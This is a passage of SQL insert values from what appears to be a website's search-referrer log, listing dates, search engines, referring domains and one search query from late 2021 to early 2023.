(665,'2021-11-28','google','www.google.com','',16292),
(666,'2021-11-29','google','www.google.com.lb','',16456),
(667,'2021-11-29','google','www.google.com.lb','',16456),
(668,'2021-11-29','google','www.google.com.lb','',16456),
(669,'2021-12-01','google','www.google.com','',16569),
(670,'2021-12-04','bing','www.bing.com','',16636),
(671,'2021-12-04','google','www.google.com','',16685),
(672,'2021-12-04','google','www.google.com','',16685),
(673,'2021-12-04','google','www.google.com','',16685),
(674,'2021-12-04','google','www.google.com','',16685),
(675,'2021-12-05','google','www.google.pl','',16788),
(676,'2021-12-07','google','www.google.com','',17119),
(677,'2021-12-08','google','www.google.com','',17251),
(678,'2021-12-09','google','www.google.com','',17278),
(679,'2021-12-09','google','www.google.com','',17314),
(680,'2021-12-17','google','www.google.com','',17486),
(681,'2021-12-18','google','www.google.com','',17507),
(682,'2021-12-19','google','www.google.com','',17520),
(683,'2021-12-19','google','www.google.com','',17524),
(684,'2021-12-19','google','www.google.com','',17526),
(685,'2021-12-19','google','www.google.com','',17530),
(686,'2021-12-21','google','www.google.com','',17577),
(687,'2021-12-21','google','www.google.com','',17578),
(688,'2021-12-21','google','www.google.com','',17580),
(689,'2021-12-21','google','www.google.com','',17588),
(690,'2021-12-22','google','www.google.com','',17593),
(691,'2021-12-22','google','www.google.com','',17605),
(692,'2021-12-23','google','www.google.com','',17624),
(693,'2021-12-23','google','www.google.com','',17641),
(694,'2021-12-24','google','www.google.com','',17664),
(695,'2021-12-24','google','www.google.com','',17672),
(696,'2021-12-24','google','www.google.com','',17672),
(697,'2021-12-24','google','www.google.com','',17672),
(698,'2021-12-24','google','www.google.com','',17672),
(699,'2021-12-25','google','www.google.com','',17705),
(700,'2021-12-25','google','www.google.com','',17705),
(701,'2021-12-25','google','www.google.com','',17705),
(702,'2021-12-25','google','www.google.com','',17705),
(703,'2021-12-26','google','www.google.com','',17710),
(704,'2021-12-27','google','www.google.com','',17724),
(705,'2022-01-06','google','www.google.co.jp','',17936),
(706,'2022-01-07','google','www.google.com','',17967),
(707,'2022-01-08','google','www.google.com','',17979),
(708,'2022-01-12','google','www.google.com','',18060),
(709,'2022-01-13','google','www.google.com','',18070),
(710,'2022-01-13','google','www.google.com','',18073),
(711,'2022-01-13','google','www.google.com','',18074),
(712,'2022-01-13','google','www.google.com','',18074),
(713,'2022-01-13','google','www.google.com','',18078),
(714,'2022-01-13','google','www.google.com','',18080),
(715,'2022-01-14','google','www.google.com','',18089),
(716,'2022-01-14','google','www.google.com','',18101),
(717,'2022-01-14','google','www.google.com','',18102),
(718,'2022-01-17','google','www.google.com','',18143),
(719,'2022-01-17','google','www.google.fr','',18151),
(720,'2022-01-19','google','www.google.com','',18183),
(721,'2022-01-21','google','www.google.com','',18213),
(722,'2022-01-22','google','www.google.com','',18225),
(723,'2022-01-23','google','www.google.com','',18242),
(724,'2022-01-24','google','www.google.com','',18259),
(725,'2022-01-24','google','www.google.com','',18266),
(726,'2022-01-25','google','www.google.com','',18282),
(727,'2022-01-25','google','www.google.com','',18285),
(728,'2022-01-25','google','www.google.com','',18292),
(729,'2022-01-27','google','www.google.com','',18311),
(730,'2022-01-27','google','www.google.com','',18311),
(731,'2022-01-27','google','www.google.com','',18311),
(732,'2022-01-27','google','www.google.com','',18318),
(733,'2022-01-27','google','www.google.com','',18329),
(734,'2022-01-28','google','www.google.com','',18347),
(735,'2022-01-30','google','www.google.com','',18375),
(736,'2022-01-30','google','www.google.com','',18375),
(737,'2022-01-30','google','www.google.com','',18375),
(738,'2022-01-30','bing','www.bing.com','',18379),
(739,'2022-01-30','google','www.google.com','',18380),
(740,'2022-02-03','google','www.google.com','',18449),
(741,'2022-02-03','google','www.google.com','',18460),
(742,'2022-02-03','google','www.google.com','',18463),
(743,'2022-02-05','google','www.google.com','',18493),
(744,'2022-02-05','google','www.google.com','',18493),
(745,'2022-02-05','google','www.google.com','',18500),
(746,'2022-02-05','google','www.google.com','',18500),
(747,'2022-02-05','google','www.google.com','',18500),
(748,'2022-02-06','google','www.google.com','',18530),
(749,'2022-02-07','google','www.google.com','',18536),
(750,'2022-02-08','google','www.google.com','',18565),
(751,'2022-02-09','google','www.google.com','',18573),
(752,'2022-02-09','google','www.google.com','',18575),
(753,'2022-02-09','google','www.google.com','',18577),
(754,'2022-02-10','google','www.google.com','',18606),
(755,'2022-02-11','google','www.google.com','',18636),
(756,'2022-02-12','google','www.google.com','',18660),
(757,'2022-02-14','google','www.google.com','',18692),
(758,'2022-02-15','google','www.google.com','',18717),
(759,'2022-02-15','google','www.google.com','',18720),
(760,'2022-02-16','google','www.google.com','',18763),
(761,'2022-02-16','google','www.google.com','',18781),
(762,'2022-02-17','google','www.google.az','',18788),
(763,'2022-02-17','google','www.google.com','',18792),
(764,'2022-02-17','google','www.google.com','',18793),
(765,'2022-02-17','google','www.google.com','',18795),
(766,'2022-02-18','duckduckgo','duckduckgo.com','',18806),
(767,'2022-02-18','google','www.google.com','',18809),
(768,'2022-02-18','google','www.google.com','',18811),
(769,'2022-02-18','google','www.google.com','',18811),
(770,'2022-02-18','google','www.google.com','',18814),
(771,'2022-02-18','google','www.google.com','',18818),
(772,'2022-02-18','google','www.google.com','',18824),
(773,'2022-02-19','google','www.google.com','',18831),
(774,'2022-02-21','google','www.google.com','',18865),
(775,'2022-02-21','google','www.google.com','',18879),
(776,'2022-02-22','bing','www.bing.com','',18892),
(777,'2022-02-22','bing','www.bing.com','',18892),
(778,'2022-02-22','bing','www.bing.com','',18892),
(779,'2022-02-23','google','www.google.com','',18906),
(780,'2022-02-23','bing','www.bing.com','',18908),
(781,'2022-02-23','google','www.google.com','',18911),
(782,'2022-02-24','google','www.google.com','',18935),
(783,'2022-02-24','google','www.google.com','',18950),
(784,'2022-02-26','google','www.google.com','',18985),
(785,'2022-02-28','google','www.google.co.jp','',19012),
(786,'2022-02-28','google','www.google.co.jp','',19011),
(787,'2022-02-28','google','www.google.co.jp','',19013),
(788,'2022-02-28','google','www.google.co.jp','',19013),
(789,'2022-02-28','google','www.google.co.jp','',19013),
(790,'2022-02-28','google','www.google.co.jp','',19014),
(791,'2022-02-28','google','www.google.co.jp','',19014),
(792,'2022-02-28','google','www.google.co.jp','',19014),
(793,'2022-02-28','google','www.google.co.jp','',19014),
(794,'2022-02-28','google','www.google.com','',19015),
(795,'2022-03-01','google','www.google.com','',19041),
(796,'2022-03-01','google','www.google.hu','',19043),
(797,'2022-03-01','google','www.google.com','',19045),
(798,'2022-03-01','google','www.google.com','',19048),
(799,'2022-03-02','google','www.google.com','',19074),
(800,'2022-03-02','bing','www.bing.com','',19075),
(801,'2022-03-03','google','www.google.com.pe','',19077),
(802,'2022-03-03','google','www.google.com','',19082),
(803,'2022-03-04','google','www.google.com','',19111),
(804,'2022-03-04','google','www.google.com','',19119),
(805,'2022-03-07','google','www.google.com','',19183),
(806,'2022-03-07','google','www.google.com.mx','',19198),
(807,'2022-03-07','bing','www.bing.com','',19199),
(808,'2022-03-08','google','www.google.com.mx','',19202),
(809,'2022-03-08','bing','www.bing.com','',19219),
(810,'2022-03-09','google','www.google.com','',19233),
(811,'2022-03-09','google','www.google.com','',19235),
(812,'2022-03-10','google','www.google.com','',19248),
(813,'2022-03-11','google','www.google.com','',19266),
(814,'2022-03-12','google','www.google.be','',19295),
(815,'2022-03-12','google','www.google.be','',19295),
(816,'2022-03-13','google','www.google.com','',19310),
(817,'2022-03-13','google','www.google.com','',19315),
(818,'2022-03-13','google','www.google.com','',19317),
(819,'2022-03-14','google','www.google.com','',19343),
(820,'2022-03-14','google','www.google.com','',19343),
(821,'2022-03-14','google','www.google.com','',19344),
(822,'2022-03-14','google','www.google.com','',19347),
(823,'2022-03-14','google','www.google.com','',19354),
(824,'2022-03-15','google','www.google.com','',19363),
(825,'2022-03-15','google','www.google.com','',19372),
(826,'2022-03-15','google','www.google.com','',19373),
(827,'2022-03-16','bing','www.bing.com','',19380),
(828,'2022-03-16','google','www.google.ca','',19386),
(829,'2022-03-17','google','www.google.com','',19395),
(830,'2022-03-17','google','www.google.com','',19411),
(831,'2022-03-18','google','www.google.com','',19426),
(832,'2022-03-19','google','www.google.com','',19460),
(833,'2022-03-20','google','www.google.com','',19501),
(834,'2022-03-21','google','www.google.com','',19504),
(835,'2022-03-21','google','www.google.com','',19504),
(836,'2022-03-21','bing','www.bing.com','',19529),
(837,'2022-03-22','google','www.google.com','',19556),
(838,'2022-03-22','google','www.google.com','',19562),
(839,'2022-03-22','google','www.google.com','',19564),
(840,'2022-03-23','google','www.google.com','',19585),
(841,'2022-03-23','google','www.google.com','',19586),
(842,'2022-03-23','google','www.google.com','',19586),
(843,'2022-03-23','google','www.google.com','',19593),
(844,'2022-03-24','google','www.google.com','',19604),
(845,'2022-03-24','google','www.google.com','',19604),
(846,'2022-03-24','google','www.google.com','',19604),
(847,'2022-03-24','google','www.google.com','',19607),
(848,'2022-03-24','google','www.google.com','',19612),
(849,'2022-03-25','google','www.google.com','',19620),
(850,'2022-03-25','google','www.google.com','',19620),
(851,'2022-03-25','google','www.google.com','',19620),
(852,'2022-03-25','google','www.google.com','',19620),
(853,'2022-03-25','google','www.google.com','',19620),
(854,'2022-03-25','google','www.google.com','',19620),
(855,'2022-03-25','google','www.google.com','',19627),
(856,'2022-03-25','google','www.google.com','',19627),
(857,'2022-03-25','google','www.google.com','',19631),
(858,'2022-03-25','google','www.google.com','',19640),
(859,'2022-03-26','google','www.google.com','',19644),
(860,'2022-03-26','google','www.google.com','',19648),
(861,'2022-03-26','google','www.google.com','',19652),
(862,'2022-03-28','bing','www.bing.com','',19686),
(863,'2022-03-28','google','www.google.com','',19687),
(864,'2022-03-28','google','www.google.com','',19687),
(865,'2022-03-28','google','www.google.com','',19689),
(866,'2022-03-28','google','www.google.com','',19696),
(867,'2022-03-29','google','www.google.com','',19724),
(868,'2022-03-30','google','www.google.com','',19744),
(869,'2022-04-01','google','www.google.com','',19782),
(870,'2022-04-01','google','www.google.com','',19782),
(871,'2022-04-01','google','www.google.com','',19782),
(872,'2022-04-01','google','www.google.com','',19784),
(873,'2022-04-02','google','www.google.com','',19816),
(874,'2022-04-02','bing','www.bing.com','',19817),
(875,'2022-04-02','google','www.google.com','',19831),
(876,'2022-04-03','bing','www.bing.com','',19853),
(877,'2022-04-04','google','www.google.ru','',19881),
(878,'2022-04-04','google','www.google.com','',19883),
(879,'2022-04-04','bing','www.bing.com','',19886),
(880,'2022-04-05','duckduckgo','duckduckgo.com','',19907),
(881,'2022-04-06','bing','www.bing.com','',19922),
(882,'2022-04-06','google','www.google.com','',19929),
(883,'2022-04-08','google','www.google.com','',19989),
(884,'2022-04-11','google','www.google.com','',20038),
(885,'2022-04-12','google','www.google.com','',20063),
(886,'2022-04-12','google','www.google.com','',20066),
(887,'2022-04-13','google','www.google.cz','',20082),
(888,'2022-04-13','google','www.google.com','',20091),
(889,'2022-04-14','google','www.google.com','',20129),
(890,'2022-04-14','google','www.google.com','',20129),
(891,'2022-04-15','google','www.google.com','',20163),
(892,'2022-04-15','google','www.google.com','',20184),
(893,'2022-04-16','google','www.google.com','',20185),
(894,'2022-04-17','bing','www.bing.com','',20217),
(895,'2022-04-17','google','www.google.com.hk','',20218),
(896,'2022-04-17','google','www.google.com','',20222),
(897,'2022-04-19','google','www.google.com','',20278),
(898,'2022-04-19','google','www.google.com','',20285),
(899,'2022-04-20','google','www.google.com','',20311),
(900,'2022-04-20','google','www.google.com','',20312),
(901,'2022-04-20','google','www.google.com','',20319),
(902,'2022-04-20','google','www.google.it','',20323),
(903,'2022-04-21','google','www.google.com','',20366),
(904,'2022-04-21','google','www.google.com','',20379),
(905,'2022-04-21','google','www.google.com','',20379),
(906,'2022-04-22','google','www.google.com','',20409),
(907,'2022-04-22','google','www.google.com','',20419),
(908,'2022-04-22','google','www.google.com','',20419),
(909,'2022-04-24','google','www.google.com','',20464),
(910,'2022-04-24','google','www.google.com.hk','',20467),
(911,'2022-04-24','google','www.google.com','',20468),
(912,'2022-04-24','google','www.google.com','',20468),
(913,'2022-04-25','google','www.google.com','',20483),
(914,'2022-04-25','google','www.google.com','',20487),
(915,'2022-04-25','google','www.google.com','',20491),
(916,'2022-04-25','bing','www.bing.com','',20501),
(917,'2022-04-25','google','www.google.com','',20506),
(918,'2022-04-28','bing','cn.bing.com','',20561),
(919,'2022-04-28','google','www.google.com','',20564),
(920,'2022-04-28','google','www.google.com','',20572),
(921,'2022-04-28','google','www.google.com','',20575),
(922,'2022-04-28','google','www.google.com','',20575),
(923,'2022-04-29','google','www.google.com','',20588),
(924,'2022-04-30','google','www.google.com','',20639),
(925,'2022-05-01','google','www.google.com','',20645),
(926,'2022-05-03','google','www.google.com','',20695),
(927,'2022-05-04','google','www.google.com','',20729),
(928,'2022-05-04','google','www.google.com','',20730),
(929,'2022-05-04','google','www.google.com','',20745),
(930,'2022-05-06','google','www.google.com','',20784),
(931,'2022-05-06','google','www.google.com','',20797),
(932,'2022-05-09','google','www.google.com','',20855),
(933,'2022-05-10','google','www.google.com','',20872),
(934,'2022-05-10','google','www.google.com','',20886),
(935,'2022-05-12','google','www.google.com','',20920),
(936,'2022-05-12','google','www.google.com','',20936),
(937,'2022-05-13','google','www.google.com','',20939),
(938,'2022-05-13','google','www.google.com','',20954),
(939,'2022-05-14','bing','www.bing.com','zip file of 99-grid-oracle-limits.conf',20969),
(940,'2022-05-16','google','www.google.com','',20994),
(941,'2022-05-17','google','www.google.com','',21019),
(942,'2022-05-17','google','www.google.com','',21039),
(943,'2022-05-17','google','www.google.com','',21040),
(944,'2022-05-18','google','www.google.com','',21048),
(945,'2022-05-18','google','www.google.com','',21053),
(946,'2022-05-18','google','www.google.com','',21058),
(947,'2022-05-19','google','www.google.com','',21089),
(948,'2022-05-19','google','www.google.com','',21106),
(949,'2022-05-22','google','www.google.com','',21159),
(950,'2022-05-22','google','www.google.com','',21160),
(951,'2022-05-23','google','www.google.com','',21178),
(952,'2022-05-24','google','www.google.com','',21226),
(953,'2022-05-25','google','www.google.com','',21233),
(954,'2022-05-25','google','www.google.com','',21234),
(955,'2022-05-25','google','www.google.com','',21239),
(956,'2022-05-25','google','www.google.be','',21241),
(957,'2022-05-26','bing','www.bing.com','',21259),
(958,'2022-05-26','google','www.google.com','',21277),
(959,'2022-05-27','google','www.google.com','',21280),
(960,'2022-05-27','google','www.google.com.hk','',21285),
(961,'2022-05-28','google','www.google.com','',21327),
(962,'2022-05-28','google','www.google.com','',21327),
(963,'2022-05-30','google','www.google.com','',21353),
(964,'2022-05-31','google','www.google.com','',21368),
(965,'2022-05-31','google','www.google.com','',21376),
(966,'2022-06-01','bing','www.bing.com','',21402),
(967,'2022-06-01','bing','www.bing.com','',21404),
(968,'2022-06-04','bing','www.bing.com','',21490),
(969,'2022-06-11','bing','cn.bing.com','',21671),
(970,'2022-06-15','bing','www.bing.com','',21845),
(971,'2022-06-17','google','www.google.com','',21911),
(972,'2022-06-24','bing','www.bing.com','',22080),
(973,'2022-06-29','bing','www.bing.com','',22199),
(974,'2022-06-30','bing','www.bing.com','',22239),
(975,'2022-07-04','duckduckgo','duckduckgo.com','',22351),
(976,'2022-07-07','bing','www.bing.com','',22431),
(977,'2022-07-14','bing','www.bing.com','',22608),
(978,'2022-07-18','bing','www.bing.com','',22723),
(979,'2022-07-28','bing','www.bing.com','',22960),
(980,'2022-07-30','bing','www.bing.com','',22995),
(981,'2022-08-02','google','www.google.com','',23060),
(982,'2022-08-03','bing','www.bing.com','',23102),
(983,'2022-08-11','bing','www.bing.com','',23291),
(984,'2022-08-15','bing','www.bing.com','',23422),
(985,'2022-08-18','bing','www.bing.com','',23485),
(986,'2022-08-18','bing','www.bing.com','',23489),
(987,'2022-08-26','bing','www.bing.com','',23708),
(988,'2022-08-27','google','www.google.com','',23727),
(989,'2022-09-02','bing','www.bing.com','',23885),
(990,'2022-09-03','bing','www.bing.com','',23901),
(991,'2022-09-12','bing','www.bing.com','',24137),
(992,'2022-09-14','google','www.google.com','',24195),
(993,'2022-09-14','bing','www.bing.com','',24198),
(994,'2022-09-19','duckduckgo','duckduckgo.com','',24328),
(995,'2022-09-23','bing','www.bing.com','',24415),
(996,'2022-09-25','bing','www.bing.com','',24475),
(997,'2022-09-28','bing','www.bing.com','',24567),
(998,'2022-09-28','google','www.google.com','',24577),
(999,'2022-09-29','google','www.google.com','',24599),
(1000,'2022-09-29','google','www.google.com','',24599),
(1001,'2022-09-30','google','www.google.com','',24621),
(1002,'2022-10-02','bing','www.bing.com','',24668),
(1003,'2022-10-05','duckduckgo','duckduckgo.com','',24727),
(1004,'2022-10-05','bing','www.bing.com','',24728),
(1005,'2022-10-05','bing','www.bing.com','',24738),
(1006,'2022-10-07','bing','www.bing.com','',24815),
(1007,'2022-10-11','google','www.google.com','',24888),
(1008,'2022-10-12','bing','www.bing.com','',24904),
(1009,'2022-10-12','google','www.google.com','',24908),
(1010,'2022-10-15','google','www.google.com','',25001),
(1011,'2022-10-15','google','www.google.com','',25002),
(1012,'2022-10-15','google','www.google.com','',25003),
(1013,'2022-10-15','google','www.google.com','',25004),
(1014,'2022-10-16','bing','www.bing.com','',25017),
(1015,'2022-10-17','google','www.google.com','',25036),
(1016,'2022-10-17','google','www.google.com','',25042),
(1017,'2022-10-17','bing','www.bing.com','',25044),
(1018,'2022-10-18','google','www.google.com','',25062),
(1019,'2022-10-18','google','www.google.com','',25062),
(1020,'2022-10-20','bing','www.bing.com','',25124),
(1021,'2022-10-21','bing','www.bing.com','',25150),
(1022,'2022-10-21','bing','www.bing.com','',25152),
(1023,'2022-10-31','bing','www.bing.com','',25218),
(1024,'2022-11-02','bing','www.bing.com','',25279),
(1025,'2022-11-04','bing','www.bing.com','',25319),
(1026,'2022-11-05','google','www.google.com','',25344),
(1027,'2022-11-05','google','google.com','',25348),
(1028,'2022-11-07','google','www.google.com','',25408),
(1029,'2022-11-07','google','www.google.com','',25413),
(1030,'2022-11-07','google','www.google.com','',25414),
(1031,'2022-11-08','google','www.google.com','',25436),
(1032,'2022-11-08','google','www.google.com','',25437),
(1033,'2022-11-09','google','www.google.com','',25458),
(1034,'2022-11-09','google','www.google.com','',25461),
(1035,'2022-11-10','google','www.google.com','',25488),
(1036,'2022-11-10','google','www.google.com','',25495),
(1037,'2022-11-14','google','www.google.com','',25628),
(1038,'2022-11-14','google','www.google.com','',25628),
(1039,'2022-11-14','google','www.google.com','',25631),
(1040,'2022-11-14','google','www.google.com','',25636),
(1041,'2022-11-14','google','www.google.com','',25639),
(1042,'2022-11-15','google','www.google.com','',25654),
(1043,'2022-11-15','google','www.google.com','',25681),
(1044,'2022-11-15','google','www.google.com','',25682),
(1045,'2022-11-17','google','www.google.com','',25709),
(1046,'2022-11-17','google','www.google.com','',25717),
(1047,'2022-11-18','bing','www.bing.com','',25730),
(1048,'2022-11-18','google','www.google.com','',25738),
(1049,'2022-11-21','google','www.google.com','',25827),
(1050,'2022-11-22','google','www.google.com','',25848),
(1051,'2022-11-22','google','www.google.com','',25848),
(1052,'2022-11-22','google','www.google.com','',25853),
(1053,'2022-11-22','google','www.google.com','',25862),
(1054,'2022-11-23','google','www.google.com','',25878),
(1055,'2022-11-23','google','www.google.com','',25880),
(1056,'2022-11-23','google','www.google.com','',25881),
(1057,'2022-11-23','google','www.google.com','',25883),
(1058,'2022-11-23','google','www.google.com','',25889),
(1059,'2022-11-23','google','www.google.com','',25893),
(1060,'2022-11-25','google','www.google.com','',25943),
(1061,'2022-11-25','google','www.google.com','',25952),
(1062,'2022-11-25','google','www.google.com','',25966),
(1063,'2022-11-28','bing','www.bing.com','',26056),
(1064,'2022-11-29','bing','www.bing.com','',26096),
(1065,'2022-11-29','google','www.google.com','',26098),
(1066,'2022-11-30','bing','www.bing.com','',26133),
(1067,'2022-11-30','bing','www.bing.com','',26149),
(1068,'2022-12-01','google','www.google.com','',26172),
(1069,'2022-12-02','google','www.google.com','',26205),
(1070,'2022-12-04','google','www.google.com','',26310),
(1071,'2022-12-05','google','www.google.com','',26333),
(1072,'2022-12-05','google','www.google.com','',26346),
(1073,'2022-12-05','bing','www.bing.com','',26350),
(1074,'2022-12-06','google','www.google.com','',26366),
(1075,'2022-12-06','bing','www.bing.com','',26369),
(1076,'2022-12-06','google','www.google.com','',26372),
(1077,'2022-12-07','google','www.google.com','',26393),
(1078,'2022-12-07','google','www.google.com','',26394),
(1079,'2022-12-07','google','www.google.com','',26407),
(1080,'2022-12-08','google','www.google.com','',26444),
(1081,'2022-12-09','bing','www.bing.com','',26466),
(1082,'2022-12-09','bing','www.bing.com','',26480),
(1083,'2022-12-10','bing','www.bing.com','',26512),
(1084,'2022-12-10','google','www.google.com','',26518),
(1085,'2022-12-11','google','www.google.com','',26592),
(1086,'2022-12-11','google','www.google.com','',26613),
(1087,'2022-12-12','google','www.google.com','',26628),
(1088,'2022-12-13','bing','www.bing.com','',26700),
(1089,'2022-12-14','bing','www.bing.com','',26747),
(1090,'2022-12-15','google','www.google.com','',26770),
(1091,'2022-12-15','google','www.google.com','',26778),
(1092,'2022-12-15','google','www.google.com','',26784),
(1093,'2022-12-15','bing','www.bing.com','',26785),
(1094,'2022-12-16','google','www.google.com','',26799),
(1095,'2022-12-16','bing','www.bing.com','',26800),
(1096,'2022-12-16','google','www.google.com','',26804),
(1097,'2022-12-16','google','www.google.com','',26812),
(1098,'2022-12-16','google','www.google.com','',26812),
(1099,'2022-12-16','google','www.google.com','',26812),
(1100,'2022-12-17','google','www.google.com','',26841),
(1101,'2022-12-18','bing','www.bing.com','',26863),
(1102,'2022-12-19','google','www.google.com','',26892),
(1103,'2022-12-20','bing','www.bing.com','',26900),
(1104,'2022-12-20','google','www.google.com','',26902),
(1105,'2022-12-20','bing','www.bing.com','',26905),
(1106,'2022-12-20','google','www.google.com','',26911),
(1107,'2022-12-22','google','www.google.com.pe','',26990),
(1108,'2022-12-25','bing','cn.bing.com','',27053),
(1109,'2022-12-25','bing','cn.bing.com','',27053),
(1110,'2022-12-25','bing','cn.bing.com','',27053),
(1111,'2022-12-25','bing','cn.bing.com','',27053),
(1112,'2022-12-25','bing','www.bing.com','',27062),
(1113,'2022-12-25','bing','www.bing.com','',27063),
(1114,'2022-12-26','google','www.google.com','',27083),
(1115,'2022-12-28','google','www.google.com','',27143),
(1116,'2022-12-28','google','www.google.com','',27144),
(1117,'2022-12-28','google','www.google.com','',27156),
(1118,'2022-12-28','google','www.google.com','',27156),
(1119,'2022-12-29','google','www.google.com','',27186),
(1120,'2022-12-29','google','www.google.com','',27188),
(1121,'2022-12-29','google','www.google.com','',27199),
(1122,'2022-12-29','bing','www.bing.com','',27202),
(1123,'2022-12-30','bing','www.bing.com','',27213),
(1124,'2022-12-31','google','www.google.com','',27263),
(1125,'2022-12-31','google','www.google.com','',27264),
(1126,'2023-01-02','google','www.google.com','',27326),
(1127,'2023-01-03','google','www.google.ch','',27353),
(1128,'2023-01-03','google','www.google.com','',27363),
(1129,'2023-01-04','google','www.google.com','',27373),
(1130,'2023-01-04','google','www.google.com','',27389),
(1131,'2023-01-04','google','www.google.com','',27403),
(1132,'2023-01-04','google','www.google.com','',27404),
(1133,'2023-01-05','bing','www.bing.com','',27427),
(1134,'2023-01-05','google','www.google.com','',27438),
(1135,'2023-01-05','google','www.google.com','',27451),
(1136,'2023-01-06','google','www.google.com','',27474),
(1137,'2023-01-06','google','www.google.com.ua','',27481),
(1138,'2023-01-07','google','www.google.com','',27514),
(1139,'2023-01-09','bing','www.bing.com','',27551),
(1140,'2023-01-09','google','www.google.com','',27553),
(1141,'2023-01-09','bing','www.bing.com','',27554),
(1142,'2023-01-09','bing','www.bing.com','',27555),
(1143,'2023-01-09','google','www.google.com','',27556),
(1144,'2023-01-09','google','www.google.com','',27565),
(1145,'2023-01-10','google','www.google.com','',27580),
(1146,'2023-01-10','google','www.google.com','',27581),
(1147,'2023-01-10','google','www.google.com','',27591),
(1148,'2023-01-11','google','www.google.com','',27654),
(1149,'2023-01-12','google','www.google.com','',27675),
(1150,'2023-01-13','google','www.google.com','',27722),
(1151,'2023-01-13','google','www.google.com','',27741),
(1152,'2023-01-13','bing','www.bing.com','',27754),
(1153,'2023-01-14','google','www.google.com','',27758),
(1154,'2023-01-16','google','www.google.com','',27819),
(1155,'2023-01-16','google','www.google.com','',27825),
(1156,'2023-01-16','google','www.google.com','',27826),
(1157,'2023-01-17','google','www.google.com','',27835),
(1158,'2023-01-17','google','www.google.com','',27843),
(1159,'2023-01-17','google','www.google.com','',27846),
(1160,'2023-01-17','google','www.google.com','',27856),
(1161,'2023-01-18','google','www.google.com','',27882),
(1162,'2023-01-18','google','www.google.com','',27882),
(1163,'2023-01-18','google','www.google.com','',27883),
(1164,'2023-01-18','google','www.google.com','',27885),
(1165,'2023-01-18','bing','www.bing.com','',27896),
(1166,'2023-01-19','google','www.google.ru','',27921),
(1167,'2023-01-19','google','www.google.com','',27922),
(1168,'2023-01-20','google','www.google.com','',27940),
(1169,'2023-01-20','google','www.google.com','',27956),
(1170,'2023-01-21','google','www.google.com','',27977),
(1171,'2023-01-21','google','www.google.com','',27977),
(1172,'2023-01-21','google','www.google.com','',27977),
(1173,'2023-01-21','google','www.google.com','',27977),
(1174,'2023-01-21','google','www.google.com','',27977),
(1175,'2023-01-21','google','www.google.com','',27977),
(1176,'2023-01-21','google','www.google.com','',27977),
(1177,'2023-01-21','google','www.google.com','',27977),
(1178,'2023-01-23','google','www.google.com','',28043),
(1179,'2023-01-23','google','www.google.com','',28050),
(1180,'2023-01-23','google','www.google.com','',28050),
(1181,'2023-01-23','google','www.google.com','',28050),
(1182,'2023-01-23','google','www.google.com','',28053),
(1183,'2023-01-23','google','www.google.com','',28062),
(1184,'2023-01-24','google','www.google.com','',28073),
(1185,'2023-01-24','google','www.google.com','',28075),
(1186,'2023-01-24','google','www.google.com','',28084),
(1187,'2023-01-24','google','www.google.com','',28084),
(1188,'2023-01-24','google','www.google.com','',28084),
(1189,'2023-01-24','google','www.google.com','',28084),
(1190,'2023-01-24','google','www.google.com','',28084),
(1191,'2023-01-24','google','www.google.com','',28084),
(1192,'2023-01-24','google','www.google.com','',28084),
(1193,'2023-01-24','google','www.google.com','',28084),
(1194,'2023-01-24','google','www.google.dk','',28092),
(1195,'2023-01-25','google','www.google.com','',28109),
(1196,'2023-01-25','google','www.google.com','',28111),
(1197,'2023-01-25','google','www.google.com','',28115),
(1198,'2023-01-25','google','www.google.com','',28132),
(1199,'2023-01-25','google','www.google.com','',28133),
(1200,'2023-01-26','google','www.google.com','',28141),
(1201,'2023-01-26','google','www.google.com','',28151),
(1202,'2023-01-26','google','www.google.com','',28152),
(1203,'2023-01-28','google','www.google.com','',28221),
(1204,'2023-01-28','google','www.google.com','',28221),
(1205,'2023-01-29','google','www.google.com','',28258),
(1206,'2023-01-29','google','www.google.com','',28266),
(1207,'2023-01-29','google','www.google.com','',28269),
(1208,'2023-01-30','google','www.google.com','',28302),
(1209,'2023-01-30','google','www.google.com','',28310),
(1210,'2023-01-31','bing','www.bing.com','',28336),
(1211,'2023-01-31','google','www.google.com','',28345),
(1212,'2023-01-31','google','www.google.com','',28368),
(1213,'2023-02-02','google','www.google.com','',28436),
(1214,'2023-02-02','google','www.google.com','',28439),
(1215,'2023-02-03','google','www.google.com','',28463),
(1216,'2023-02-03','google','www.google.com','',28463),
(1217,'2023-02-03','google','www.google.com','',28466),
(1218,'2023-02-03','google','www.google.com','',28467),
(1219,'2023-02-03','google','www.google.com','',28490),
(1220,'2023-02-05','bing','www.bing.com','',28550),
(1221,'2023-02-05','google','www.google.com','',28554),
(1222,'2023-02-06','google','www.google.com','',28568),
(1223,'2023-02-06','google','www.google.com','',28569),
(1224,'2023-02-07','google','www.google.com','',28592),
(1225,'2023-02-07','google','www.google.com','',28603),
(1226,'2023-02-07','google','www.google.com','',28605),
(1227,'2023-02-08','google','www.google.com','',28646),
(1228,'2023-02-08','google','www.google.com','',28662),
(1229,'2023-02-09','google','www.google.com','',28676),
(1230,'2023-02-09','google','www.google.com','',28679),
(1231,'2023-02-10','google','www.google.com','',28695),
(1232,'2023-02-11','google','www.google.com','',28755),
(1233,'2023-02-11','bing','www.bing.com','',28763),
(1234,'2023-02-11','bing','www.bing.com','',28763),
(1235,'2023-02-11','bing','www.bing.com','',28763),
(1236,'2023-02-11','bing','www.bing.com','',28763),
(1237,'2023-02-11','bing','www.bing.com','',28763),
(1238,'2023-02-11','bing','www.bing.com','',28763),
(1239,'2023-02-11','bing','www.bing.com','',28763),
(1240,'2023-02-11','bing','www.bing.com','',28763),
(1241,'2023-02-11','bing','www.bing.com','',28763),
(1242,'2023-02-11','bing','www.bing.com','',28763),
(1243,'2023-02-11','bing','www.bing.com','',28763),
(1244,'2023-02-11','bing','www.bing.com','',28763),
(1245,'2023-02-11','bing','www.bing.com','',28763),
(1246,'2023-02-11','bing','www.bing.com','',28763),
(1247,'2023-02-11','bing','www.bing.com','',28763),
(1248,'2023-02-11','bing','www.bing.com','',28763),
(1249,'2023-02-12','google','www.google.com','',28775),
(1250,'2023-02-13','google','www.google.com','',28814),
(1251,'2023-02-13','google','www.google.com','',28815),
(1252,'2023-02-13','google','www.google.com','',28816),
(1253,'2023-02-13','google','www.google.com','',28817),
(1254,'2023-02-13','google','www.google.com','',28818),
(1255,'2023-02-13','google','www.google.com','',28818),
(1256,'2023-02-13','google','www.google.com','',28818),
(1257,'2023-02-14','google','www.google.com','',28851),
(1258,'2023-02-14','google','www.google.com','',28859),
(1259,'2023-02-14','google','www.google.com','',28862),
(1260,'2023-02-14','google','www.google.com','',28881),
(1261,'2023-02-15','google','www.google.com','',28926),
(1262,'2023-02-16','google','www.google.com','',28962),
(1263,'2023-02-16','google','www.google.com.hk','',28969),
